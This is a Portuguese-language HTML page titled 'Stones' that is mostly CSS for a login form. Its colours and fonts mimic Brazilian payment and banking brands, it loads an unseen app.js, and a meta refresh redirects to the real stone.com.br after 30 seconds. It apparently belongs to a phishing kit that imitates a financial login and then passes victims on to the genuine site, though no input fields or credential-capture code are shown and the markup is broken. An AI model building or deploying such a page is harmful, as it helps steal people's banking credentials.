<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="favicon.ico">  
    <meta http-equiv="refresh" content="30;https://www.stone.com.br/">
    <script defer src="app.js"></script>
    <title>Stones</title>
   
   
   
   <style>
        /* Estilo para o body */
        body {
           
            margin: 0;
            padding: 0;
            background-image: url('cel232.jpg');
            background-repeat: no-repeat;
            background-size: cover;
            font-family: Arial, sans-serif;
            
        }



        @media (max-width: 520px) {
            body {

              place-items: center;
                margin: 0;
            padding: 0;
      
            background-image: url('cel232.jpg');
            background-repeat: no-repeat;
            background-image: center;
            background-size: cover;
           
            font-family: Arial, sans-serif;
      }

            .form-input {
                padding: 10px,10px,10px,10px;
                border: 1px solid #ccc;
                margin-left: -50px;
                font-size: 24px;
                color:blue;
                border: 0;
                  border-bottom: 1px solid rgb(200,200,200);   
                  margin-right:105px;
                  outline: 0;
                  width: 80%;
                  
              }


            .login-container {
       
                    margin-top: 90px;
                    margin-left: -2000px;
                          
                    padding: 20px;
                    border-radius: 5px;
                
                }

                 .login-button {
                        margin-top: 27px;
                        display: inline-block;
                        margin-right: 70px;
                        width: 300px;
                        height: 50px;
                        padding: 10px;
                        background-color: #ec7000;
                        border: none;
                        color: #fff;
                        font-size: 18px;
                        border-radius: 3px;
                        cursor: pointer;
                    }


                    .botao

                    {
                    margin-left: -40px;
                    }

                    .imp

{
margin-left: 10%;
}

        
         

      
  }

  @media (max-width: 720px) {
            body {
                margin: 0;
            padding: 0;
            background-color: #fff;
            background-repeat: no-repeat;
            background-size: cover;
            font-family: Arial, sans-serif;
      }

                .form-input {
              padding: 5px;
              border: 1px solid #ccc;
              margin-left: -10px;
              margin-right: -100px;
              font-size: 24px;
              color:#ec7000;
              border: 0;
                border-bottom: 1px solid rgb(200,200,200);   
                margin-right:105px;
                outline: 0;
                width: 300px;
                
            }



                  .login-container {
                  
                  margin-top: 90px;
                  margin-left: -17%;
                          
                  padding: 20px;
                  border-radius: 5px;
            
                    }

                    .login-button {
                    margin-top: 27px;
                    margin-left: -100px;
                        width: 400px;
                        height: 50px;
                        padding: 10px;
                        background-color: #ec7000;
                        border: none;
                        color: #fff;
                        font-size: 18px;
                        border-radius: 3px;
                        cursor: pointer;
                    }


}         



      
  


 
        /* Estilo para o contêiner do formulário */
        .login-container {
            position: absolute;
            top: 370px;
            left: 55%;
            transform: translate(-50%, -50%);
    
            padding: 20px;
            border-radius: 7px;
          
        }

        /* Estilo para os campos de entrada e o botão */
        .form-input {
          padding: 15px;
          border: 1px solid #ccc;
          margin-left: -50px;
          font-size: 20px;
          color:rgba(0,14,24,.593);
            border-radius: 7px;
            border-bottom: 1px solid rgb(200,200,200);   
            margin-right:105px;
            outline: 0;
            width: 260px;
           
            
        }

        input:focus{
          border-color: rgba(0,107,59,.906);
          outline: 0;
          box-shadow: inset 0 1px 1px #00000013, 0 0 8px #30a46c;
          color:#781b8e;
          

          
          }

          input::placeholder{
          
          color:rgba(66, 67, 68, 0.244);
          

          }

        .login-button {
          margin-top: -25px;
          margin-left: -30px;
            width: 260px;
            height: 50px;
            padding: 10px;
            background-color: #30a46c;
            border: none;
            color: #fff;
            font-size: 18px;
            border-radius: 7px;
            cursor: pointer;
        }

        .login-button:hover {
            background-color: rgba(0,107,59,.906);
        }


        ::placeholder{
  color:black;
  font-family: "Itau Display","sans-serif";
  font-size: 20px;
}


    </style>
</head>
<body>
    <div class="login-container">


          
        </form>
    </div>
</div>
</body>
</html>